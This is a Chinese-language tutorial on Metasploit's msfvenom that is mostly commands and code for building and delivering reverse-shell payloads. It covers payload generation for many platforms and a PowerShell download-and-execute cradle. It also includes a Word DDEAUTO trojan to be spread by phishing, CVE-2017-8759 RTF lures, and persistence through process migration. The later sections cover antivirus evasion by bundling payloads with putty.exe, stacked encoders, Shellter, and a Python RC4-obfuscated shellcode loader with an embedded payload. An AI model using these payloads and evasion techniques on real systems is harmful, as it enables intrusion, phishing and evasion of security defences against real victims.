Metasploit msfvenom
一、 msfvenom简介
msfvenom是msf payload和msf encode的结合体,于2015年6月8日取代了msf payload和msf encode。在此之后,metasploit-framework下面的msf payload(载荷生成器),msf encoder(编码器),msfcli(监听接口)都不在支持。
二、msf venom参数
-p, -payload <payload>指定需要使用的payload(攻击载荷)。也可以使用自定义的payload,几乎是支持全平台的 -l, -list [module_type] 列出指定模块的所有可用资源。模块类型包括:payloads,encoders,nops,all -n,-nopsled <length>为payload预先指定一个NOP滑动长度 -f, -format <format>指定输出格式(使用--help-formats来获取msf支持的输出格式列表) -e, -encoder[encoder]指定需要使用的encoder(编码器),如果即没有-e选择也没用-b选项,则输出raw payload-a, -arch <architecture> 指定payload的目标架构,例如x86|x64|x86_64-plaform <platform>指定payload的目标平台 -s, -space <length>设定有效攻击荷载的最大长度,就是文件大小 -b, -bad-chars <list>设定规避字符集,指定需要过滤的坏字符例如:不使用'x0f'、'\x00';-i, -iterations <count>指定payload的编码次数 -c, -add-code <path> 指定一个自定义的可执行文件为模板,并将payload嵌入其中 -k, -keep保护模板程序的动作,注入的payload作为一个新的进程运行 -payload-options列举payload的标准选项 -o, -out <path> 指定创建好的payload的存放位置 -v, -var-name <name>指定一个自定义的变量,以确定输出格式 -shellest 最小化生成payload -h, -help查看帮助选项 -help-formats查看msf支持的输出格式列表
查看所有payload
root@kali:~/桌面# msfvenom --list payloads
查看所有编码器
root@kali:~/桌面# msfvenom --list encoders
# 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器
查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用
root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp --list-options
三、监听参数
防止假session 在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。 msf exploit(multi/handler) > set ExitOnSession false //可以在接收到seesion后继续监听端口,保持侦听。 防止session意外退出 msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0 //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0 msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭
四、handler后台持续监听
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST 192.168.8.124 set LPORT 1122 set ExitOnSession false exploit -j -z msf exploit(multi/handler) > exploit -j -z 使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。 还有种比较快捷的建立监听的方式,在msf下直接执行: msf5 > handler -H 192.168.244.128 -P 1122 -p windows/meterpreter/reverse_tcp
五、payload的可持续化
一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe
生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。 在上面的生成payload参数中: (1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程。 (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下。
把生成的shell.exe(此文件不免杀) 复制到windows 2003靶机中双击运行
六、各平台payload生成
6.1 Linux
(1)设置监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(multi/handler) > set lport 1123 lport => 1123 msf5 exploit(multi/handler) > run
(2)生成Linux payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1123 -f elf > shell.elf
(3)执行shell.elf
root@kali:~# ls -larth shell.elf -rw-r--r-- 1 root root 250 6月 13 20:47 shell.elf root@kali:~# chmod +x shell.elf root@kali:~# ./shell.elf
(4) 查看sessions
6.2 Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f exe > shell.exe
6.3 Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
6.4 Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f raw > shell.apk msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 R > test.apk
七、生成脚本payload
7.1 powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
7.2 nc正向连接
msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.244.128 LPORT=1122 -f exe> 1.exe
7.3 nc反向连接,监听
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f exe> 1.exe
7.4 PHP
kali监听会话、把shell.php上传至目标网站访问就可以建立会话了
(1)建立监听
msf5 exploit(multi/handler) > use exploit/multi/handler msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(multi/handler) > set lport 1124 lport => 1124 msf5 exploit(multi/handler) > run
(2)生成payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1124 -f raw > shell.php
(3)把shell.php上传至目标网站
(4)浏览器访问shell.php
(5)查看建立的session
7.5 ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
7.6 JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
7.7 WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
7.8 powershell配置msf无文件攻击
(1)生成ps脚本、把生成的脚本放到web站点下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1125 -f psh-reflection >x.ps1
(2)设置监听
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.244.128
set lport 1125 run
(3)客户端运行
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1')
(4)查看会话
7.9 powershell配置word伪装木马
监听、生成payload操作和7.8操作一致
(1)新建一个word文档——插入——文档部件——域
DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1') "
(3)通过钓鱼、社工等方式让其他人打开此word文档
7.10 msf宏钓鱼
git clone https://github.com/bhdresh/CVE-2017-8759.git cd CVE-2017-8759/ python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.244.128/logo.txt # 生成如下图所示的文件
生成payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1133 -f exe > /root/shell.exe python cve-2017-8759_toolkit.py -M exp -e http://192.168.244.128/shell.exe -l shell.exe
开启监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(multi/handler) > set lport 1133 lport => 1133 msf5 exploit(multi/handler) > run
把Invoice.rtf 上传到Windows 7
八、ngrok穿透内网
unzip linux_amd64.zip
cd linux_amd64
./sunny clientid xxxxid
生成payload
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10929 -f exe > a.exe
开启监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 127.0.0.1 lhost => 127.0.0.1 msf5 exploit(multi/handler) > set lport 10929 lport => 10929 msf5 exploit(multi/handler) > run
Windows 7执行木马
查看session
九、msf5-Evasion免杀模块
9.1 Defender免杀
msf5 > use windows/windows_defender_exe msf5 evasion(windows/windows_defender_exe) > options msf5 evasion(windows/windows_defender_exe) > set filename ev.exe filename => ev.ext msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 evasion(windows/windows_defender_exe) > set lport 1177 lport => 1177 msf5 evasion(windows/windows_defender_exe) > run
设置监听
handler -H 192.168.244.128 -P 1177 -p windows/meterpreter/reverse_tcp
目前已经不免杀
9.2 捆绑免杀
可以在此站检测木马 https://www.virustotal.com/gui/home/upload
生成payload 捆绑putty.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -x putty.exe -f exe -o payload3.exe
捆绑编码免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
多重编码免杀
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.244.128 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe
十、shellter免杀
shellcode代码注入工具
https://www.shellterproject.com/download/
vim /etc/apt/sources.list
#中科大源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
apt-get update
apt-get install shellter
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
启动shellter
root@kali:~# shellter
开启监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(multi/handler) > set lport 1155 lport => 1155 msf5 exploit(multi/handler) > run
把putty.exe复制到window7中运行(运行最新版本的360)
查看建立的session
用360动态杀毒时(不免杀)
十一、免杀python脚本
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1155 LHOST=192.168.244.128 -e x86/shikata_ga_nai -i 17 -f py -o /root/121.py
修改生成的py文件(头部和尾部添加、如下所示)
from ctypes import * import ctypes import sys, os, hashlib, time, base64 def rc4(string, op='encode', public_key='ddd', expirytime=0): ckey_lenth = 4 public_key = public_key and public_key or '' key = hashlib.md5(public_key).hexdigest() keya = hashlib.md5(key[0:16]).hexdigest() keyb = hashlib.md5(key[16:32]).hexdigest() keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or '' cryptkey = keya + hashlib.md5(keya + keyc).hexdigest() key_lenth = len(cryptkey) # 64 string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string string_lenth = len(string) result = '' box = list(range(256)) randkey = [] for i in xrange(255): randkey.append(ord(cryptkey[i % key_lenth])) for i in xrange(255): j = 0 j = (j + box[i] + randkey[i]) % 256 tmp = box[i] box[i] = box[j] box[j] = tmp for i in xrange(string_lenth): a = j = 0 a = (a + 1) % 256 j = (j + box[a]) % 256 tmp = box[a] box[a] = box[j] box[j] = tmp result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) if op == 'decode': if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5( result[26:] + keyb).hexdigest()[0:16]: return result[26:] else: return None else: return keyc + base64.b64encode(result) buf = b"" buf += b"\xb8\x28\xce\x23\x6c\xdb\xca\xd9\x74\x24\xf4\x5a\x31" buf += b"\xc9\xb1\xec\x31\x42\x14\x03\x42\x14\x83\xea\xfc\xca" buf += b"\x3b\xf8\xa6\xb1\x1e\x60\x6e\x19\x47\xeb\xab\x55\x27" buf += b"\x3d\x7d\x24\x3d\xbe\x92\xba\x8f\x9e\x7a\x41\xaf\x36" buf += b"\x61\x6a\x0b\xa1\x03\xb3\x5f\xd3\x48\x35\x26\xa9\x11" buf += b"\xa7\x32\x7d\x80\xe6\xd1\x66\x9a\x66\xc4\xce\x49\x58" buf += b"\x57\x8b\x00\x8c\x91\xdf\xd7\xec\xe0\x5f\x72\x48\xc8" buf += b"\xee\xaf\x99\x62\x57\xf0\x56\x40\x7e\xc2\xc2\x8e\x3b" buf += b"\xbe\x0f\x7d\x5b\x82\xa3\xd8\x02\xcf\xf4\xf7\x15\x32" buf += b"\xb8\xbc\x0a\x03\xb8\x34\x22\x2f\x21\x58\x83\x6b\x8f" buf += b"\xa0\x32\xda\x92\x9a\x7a\x0b\xb8\x42\x82\x09\xe9\x32" buf += b"\x94\x17\xcb\x5a\xea\x8e\xdb\xda\x9f\x86\x17\x6b\xc8" buf += b"\x95\xf1\xbc\x1d\x1c\xbc\x57\x10\xad\x85\x4a\x35\x3f" buf += b"\xf8\x01\xc0\xa4\x35\x5c\xd8\xb7\xf5\x2c\xfd\x2f\xd8" buf += b"\x57\x21\xe3\x0d\x0c\x57\xa1\x0f\xcb\xfe\x18\x5a\x7f" buf += b"\xa5\xa6\xc6\x2e\x61\xad\xc3\x4c\xb6\xa1\x03\x47\x83" buf += b"\x03\xd2\x09\xff\x15\xd3\x38\x12\x40\x94\xdd\xae\x5a" buf += b"\x32\x52\x6c\xa2\xa8\x18\xdd\xd9\x6b\x3e\x84\x15\x8f" buf += b"\xe4\x85\x9e\x3d\xca\xee\xa7\xff\x44\x18\xf9\xcd\x80" buf += b"\x9a\xc5\x0a\x25\xcc\xf1\xcd\x1f\xf6\xf4\x45\x16\xbc" buf += b"\x8c\x96\xdc\x71\x9b\x35\xaf\xaf\xa0\xd3\x57\x0a\x2e" buf += b"\xb1\x63\xa6\xfa\xa4\x11\xa1\x8d\x87\xc9\xeb\x0e\x85" buf += b"\xa9\x6d\x9c\x4b\x60\xd0\xcb\xf6\x2b\xa9\xcf\x36\xef" buf += b"\xa2\x5f\x98\xa1\x38\xfd\x86\x74\xab\xd2\x8b\x4b\xfd" buf += b"\xd0\xd7\x7b\x64\x8b\x34\x3a\xad\x19\xce\xba\x88\x33" buf += b"\x92\x59\xb4\xea\x80\x5a\x6f\x39\xbb\xe4\xa9\xba\xd4" buf += b"\x3b\x74\xa0\xc0\x84\xc8\xb4\xf0\xcd\x2e\x30\x05\x96" buf += b"\x87\xd3\x04\xf6\x69\x4b\xd0\x88\x00\x83\x4a\x3b\x1e" buf += b"\x50\x68\x47\x9f\x12\x81\x84\x49\x18\x88\x78\x34\x28" buf += b"\x13\x49\x37\xd0\xc2\x6f\x78\x88\xc5\x30\xbd\x92\x90" buf += b"\x6d\x96\xa7\xbd\xec\xef\x91\x1c\x6b\xb5\xca\x24\x24" buf += b"\x41\x2a\xce\x4f\x7f\x5e\x82\xc8\xbc\x8a\x1c\xd8\x0a" buf += b"\xe3\xcf\xb6\x3e\x12\x72\x4e\x05\xd0\x40\x59\x82\x05" buf += b"\x32\xbb\x1a\xe4\x0a\x62\x9a\xff\x89\xc6\xce\xaa\xeb" buf += b"\x04\xae\x95\x65\x19\x3b\x79\x1e\xe7\xe7\x06\x8e\xa7" buf += b"\xa2\x98\x6c\x6c\xb7\x01\x66\x13\x09\x60\x78\x39\x3f" buf += b"\x49\x47\x7c\x55\xba\x57\xd2\x93\xb5\xcc\x6d\x23\xe2" buf += b"\xd6\xcb\xd5\x13\x46\x60\x5b\xaf\x49\x7a\x00\xdc\x78" buf += b"\x58\x6c\x46\x79\xd8\x3e\xdb\x3f\xd7\x3f\x08\xf2\x8b" buf += b"\x2d\x22\x07\x03\x7d\x88\xfe\xc6\xef\xe4\x95\x4a\x56" buf += b"\xa0\x81\xf5\x69\xca\x38\x00\x3f\xa0\x86\x9a\xca\xd8" buf += b"\x5f\xe5\x38\x93\xb0\x1b\x81\x32\x15\xbc\xba\xc3\x9d" buf += b"\xa7\x85\x9c\x5b\x93\x42\x63\xc2\xb6\x4b\x72\xb7\x7e" buf += b"\xd8\xb9\x14\xe7\x5a\x34\x5a\xee\xa9\x8b\x3d\x13\x84" buf += b"\x18\xf1\xb3\xda\x05\x27\x95\xb2\x7f\xda\x67\xf7\x68" buf += b"\x47\x5c\x0a\xe6\x95\x0f\xbe\x39\xea\xe5\xf6\x09\x2a" buf += b"\xe8\x0c\x93\xb0\xf3\x79\x03\xd5\x37\xf1\xcb\xae\x35" buf += b"\x4c\xd9\x3a\xa7\x74\xf2\x49\xdb\x25\x30\x08\xc2\x26" buf += b"\x72\x8b\x40\x30\xd9\x93\x5c\xee\xbd\xe1\xd1\x2d\x03" buf += b"\x05\x16\x11\x74\x2d\xfe\x24\x84\x27\x0f\x8e\x0d\xd9" buf += b"\x26\x63\x0c\x45\x86\xa3\x59\x9d\x3f\xbf\x53\x21\x67" buf += b"\xbf\xad\x77\xb0\x38\xf2\x05\x6c\x51\xcd\xc7\xfd\x11" buf += b"\xee\xd6\x07\x01\x82\xf5\x0c\xb9\xa8\x40\x0a\xb6\x17" buf += b"\x41\xc9\xa1\x67\x5a\x7b\x21\x15\x3f\x5d\xe1\xe3\x61" buf += b"\x22\xb5\xbb\xc9\x91\x8b\xd7\x62\x34\xf3\x56\x74\x15" buf += b"\xae\xbf\xc3\xf3\x53\x0b\xb3\xef\xc1\x59\x95\x2b\x54" buf += b"\x8c\x50\x90\xab\xc8\xa3\x1b\xaa\xda\xdd\xd6\x0e\xd6" buf += b"\xbd\x6d\x7b\x76\x88\x04\x42\x50\xf0\x9a\xe1\x72\x79" buf += b"\xdb\x8b\x3b\xb4\x6b\x8e\xd2\x58\xa4\x1b\x81\xad\x48" buf += b"\x17\xaa\x9c\xe5\x1f\xc3\x10\xd8\x82\x42\x7a\xb0\x3b" buf += b"\x29\xb7\xa9\xf1\xee\x40\x42\xcc\xa8\x8b\x84\xce\x7c" buf += b"\xd7\x0d\x34\x08\xb6\xe5\xaf\x27\x84\x5c\x28\x15\xe1" buf += b"\x46\x7c\xb0\xa8\x7a\xc3\x77\x12\x7a\xda\xb3\xc8\x5f" buf += b"\x29\x08\x82\x05\xf9\xe4\xb3\xcd\xf6\x41\x5f\x55\x9b" buf += b"\x9a\x5d\x6a\x69\x1b\x51\x0c\x77\xf5\xc1\x79\x1b\x1e" buf += b"\xd8\xd3\x24\x41\xee\x4f\x1c\x5c\xef\x77\xf2\x68\x71" buf += b"\x49\x51\xfc\x27\x5e\x55\x35\xdf\x4f\x9e\x8d\xe5\xf9" buf += b"\x3e\x7d\xc7\x58\x99\xc0\xe2\xda\xe7\xad\x85\xf1\xb3" buf += b"\x34\xc9\xc4\x48\x26\x4f\x9e\x66\xf1\xcb\x68\x82\xf7" buf += b"\xe6\x96\x43\x9a\x0c\xe4\x0e\x36\x81\xde\x7d\xa9\x54" buf += b"\xce\xa2\xf5\xfc\xcc\x89\x0d\x01\x5c\xf2\xbe\x99\xc2" buf += b"\xe3\x68\x12\x3d\xb0\x76\xfe\xd6\x1c\xd1\x57\xa7\xa8" buf += b"\xa2\xfc\x4a\x65\x75\xa2\xd1\xa4\xbe\xd9\x98\x03\x37" buf += b"\xae\xaf\x82\x2a\x55\x57\xe9\x70\x9b\x3b\x07\x44\x6b" buf += b"\x47\xb7\x42\x41\x10\x01\x25" buf=rc4(buf,'encode','6666666666666') # libc = CDLL('libc.so.6') PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer) addr = libc.valloc(size) addr = c_void_p(addr) if 0 == addr: raise Exception("Failed to allocate memory") memmove(addr, buf, size) if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception("Failed to set protection on buffer") return addr VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect shellcode = bytearray(rc4(buf, 'decode', '6666666666666')) whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0: if 666 == 666: ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd) memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1) VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell), buf, ctypes.c_int(len(shellcode))) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()
安装pyinstaller 打包exe
pip install pywin32
pip install pyinstaller
打包exe并执行此exe文件
C:\Python27>pyinstaller -F 121.py
十二、venom秒杀payload
git clone https://github.com/r00t-3xp10it/venom sudo ./setup.sh sudo ./venom.sh
